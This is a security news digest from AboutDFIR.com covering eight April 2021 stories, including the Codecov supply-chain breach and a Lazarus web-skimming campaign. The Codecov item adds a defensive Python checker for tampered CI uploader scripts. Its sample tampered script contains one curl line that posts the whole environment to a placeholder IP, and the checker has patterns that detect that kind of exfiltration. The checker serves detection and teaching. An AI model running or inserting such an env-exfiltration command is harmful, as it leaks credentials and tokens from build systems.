AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response
InfoSec News Nuggets 04/21/2021

1 – EFF Will Tell Copyright Office That Consumers Should Have the Freedom to Fix, Modify Digital Devices They Own

On Tuesday, April 20, and Wednesday, April 21, experts from the Electronic Frontier Foundation (EFF) fighting copyright abuse will testify at virtual hearings held by the Copyright Office in favor of exemptions to the Digital Millennium Copyright Act (DMCA) so people who have purchased digital devices—from cameras and e-readers to smart TVs—can repair or modify them, or download new software to enhance their functionality. The online hearings are part of a rulemaking process held every three years by the Copyright Office to determine whether people are harmed by DMCA “anti-circumvention” provisions, which prohibit anyone from bypassing or disabling access controls built into products by manufacturers to lock down the software that runs them. These provisions are often abused by technology companies to control how their devices are used and stop consumers, innovators, competitors, researchers, and everyday repair businesses from offering new, lower-cost, and creative services.


2 – North Korean hackers adapt web skimming for stealing Bitcoin

Hackers linked with the North Korean government applied the web skimming technique to steal cryptocurrency in a previously undocumented campaign that started early last year, researchers say. The attacks compromised customers of at least three online stores and relied on infrastructure used for web skimming activities and attributed in the past to Lazarus APT, also known as Hidden Cobra. In research published last year, Dutch cyber-security company Sansec exposed Lazarus operations that had been going since 2019 to capture payment card data from online shoppers at large retailers in the U.S. and Europe. The malicious JavaScript code (also referred to as JS-sniffer or web skimmer) used in those attacks collected the payment card details that customers entered on the checkout page.


3 – Member of FIN7 Hacking Group Sentenced to US Prison

A Ukrainian national arrested for his role in a hacking group that compromised millions of financial accounts was sentenced to a decade in prison, US prosecutors said Friday. Fedir Hladyr, 35, had a high-level role as a manager and systems administrator for a hacking group known as FIN7, authorities said.

He was one of three Ukrainians arrested in mid-2018 for hacking more than 100 US companies and stealing millions of credit and debit card numbers, according to the Justice Department. “The defendant and his conspirators compromised millions of financial accounts and caused over a billion dollars in losses to Americans and costs to the US economy,” acting Assistant Attorney General Nicholas McQuaid said in a release. Hladyr was arrested in Germany, then extradited to Seattle where he pleaded guilty in 2019 to conspiring to commit computer hacking and wire fraud, according to authorities.


4 – 6 Cybersecurity Tips for Working from Home

Here at Tripwire, we, like many others, recently surpassed the one-year anniversary of working from home due to the COVID-19 pandemic. Since March of 2020, we have converted kitchens, spare bedrooms and garages into office spaces. Our pets and children have become our coworkers, and companies are reporting a sudden increase in shirt sales as opposed to pant sales. This unique transition has required flexibility to adapt to a new environment, and with that new environment has come a different set of security practices. Although many of us have finally established a rhythm when it comes to working from home, it is worth reminding ourselves of some important security practices every remote employee should be implementing.


5 – Hundreds of networks reportedly hacked in Codecov supply-chain attack

More details have emerged on the recent Codecov system breach, which is now being likened to the SolarWinds hack. In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this breach beyond just Codecov’s own systems. As reported by BleepingComputer last week, Codecov had suffered a supply-chain attack that went undetected for over two months. In this attack, threat actors gained Codecov’s credentials from a flawed Docker image and then used them to alter Codecov’s Bash Uploader script, which is used by the company’s clients. By replacing Codecov’s IP address with their own in the Bash Uploader script, the attackers paved a way to silently collect Codecov customers’ credentials—tokens, API keys, and anything stored as environment variables in the customers’ continuous integration (CI) environments. Codecov is an online software testing platform that can be integrated with your GitHub projects to generate code coverage reports and statistics, which is why it is favored by over 29,000 enterprises building software.
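The attack above turned on a vendor-supplied CI script being modified in place. As an added example (not Codecov’s code or a real uploader), the check below does what a CI pipeline can do before executing such a script: compare it against a pinned SHA-256 digest, and flag any network target that is a raw IP address or outside an allowlist, or that ships the whole environment in a curl/wget call. The script fragments, the host `uploader.example.com`, and the allowlist are all constructed for this example.

```python
import hashlib
import re

# Constructed samples for this example (not Codecov's real uploader): a known-good
# fragment of a CI upload script, and a tampered copy with one extra line that
# posts the CI environment to a raw IP address, the pattern described above.
KNOWN_GOOD = (
    "#!/usr/bin/env bash\n"
    "# upload the coverage report to the service\n"
    'curl -X POST --data-binary @coverage.xml '
    '"https://uploader.example.com/v4?token=$CODECOV_TOKEN"\n'
)
TAMPERED = KNOWN_GOOD + 'curl -s -d "$(env)" http://203.0.113.7/upload || true\n'

# Hypothetical allowlist of hosts the script is expected to talk to.
ALLOWED_HOSTS = {"uploader.example.com"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# In practice the pinned digest comes from the vendor's published checksum or from
# the copy you vetted; here it is derived from the constructed known-good text.
PINNED_SHA256 = sha256_hex(KNOWN_GOOD)


def check_uploader(script: str, pinned_sha256: str, allowed_hosts: set) -> list:
    """Return a list of findings; an empty list means the script passed every check."""
    findings = []
    actual = sha256_hex(script)
    if actual != pinned_sha256:
        findings.append(f"checksum mismatch: expected {pinned_sha256[:12]}, got {actual[:12]}")
    for lineno, line in enumerate(script.splitlines(), 1):
        for host in URL_RE.findall(line):
            if IPV4_RE.match(host):
                findings.append(f"line {lineno}: network target is a raw IP address {host}")
            elif host not in allowed_hosts:
                findings.append(f"line {lineno}: network target {host} is not allowlisted")
        # A curl/wget call that ships the whole environment is the exfiltration pattern.
        if re.search(r"\b(curl|wget)\b", line) and ("$(env)" in line or "printenv" in line):
            findings.append(f"line {lineno}: environment variables passed to a network call")
    return findings


if __name__ == "__main__":
    for name, script in (("known-good", KNOWN_GOOD), ("tampered", TAMPERED)):
        print(name, check_uploader(script, PINNED_SHA256, ALLOWED_HOSTS) or "OK")
```

The checksum comparison alone would have caught the change; the content checks are there for the case where the pinned digest has been refreshed without anyone reading the diff.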


6 – Reddit introduces its Clubhouse clone because it’s 2021 and that’s what we do now

If you’re a social network, you have to have a Clubhouse clone on your platform. I don’t make the rules. Reddit is the latest to join the fold, and announced a live audio product last night. The product is called Reddit Talk, and it lets you voice chat with other folks on your subreddit in real-time. However, it’s currently in the test phase and you have to register your interest through a waitlist if you want to try it out. The functionality of the feature is akin to Clubhouse in terms of creating rooms and joining them with Twitter Spaces-inspired emoji reactions thrown in. Reddit’s product manager, Peter Yang, noted that this product is different because the platform’s pseudo-anonymous nature allows users to have more authentic conversations. However, that’s true for Twitter and Discord as well.


7 – Why a U.S. hospital and oil company turned to facial recognition

Deployments of facial recognition from Israeli startup AnyVision show how the surveillance software has gained adoption across the United States even as regulatory and ethical debates about it rage. The technology finds certain faces in photos or videos, with banks representing one sector that has taken interest in systems from AnyVision or its many competitors to improve security and service. Organizations in other industries are chasing similar goals. The Los Angeles hospital Cedars-Sinai and oil giant BP Plc (BP.L) are among several previously unreported users of AnyVision. Cedars-Sinai’s main hospital uses AnyVision facial recognition to give staff a heads-up about individuals known for violence, drug fraud or using different names at the emergency room, three sources said. Cedars said it “does not publicly discuss our security programs” and could not confirm the information.


8 – ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users

Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America. The stolen data includes customer email addresses, dates of birth, phone numbers, license plate numbers, hashed passwords and mailing addresses. KrebsOnSecurity first heard about the breach from Gemini Advisory, a New York City-based threat intelligence firm that keeps a close eye on the cybercrime forums. Gemini shared a new sales thread on a Russian-language crime forum that included my ParkMobile account information in the accompanying screenshot of the stolen data. Included in the data were my email address and phone number, as well as license plate numbers for four different vehicles we have used over the past decade. Asked about the sales thread, Atlanta-based ParkMobile said the company published a notification on Mar. 26 about “a cybersecurity incident linked to a vulnerability in a third-party software that we use.”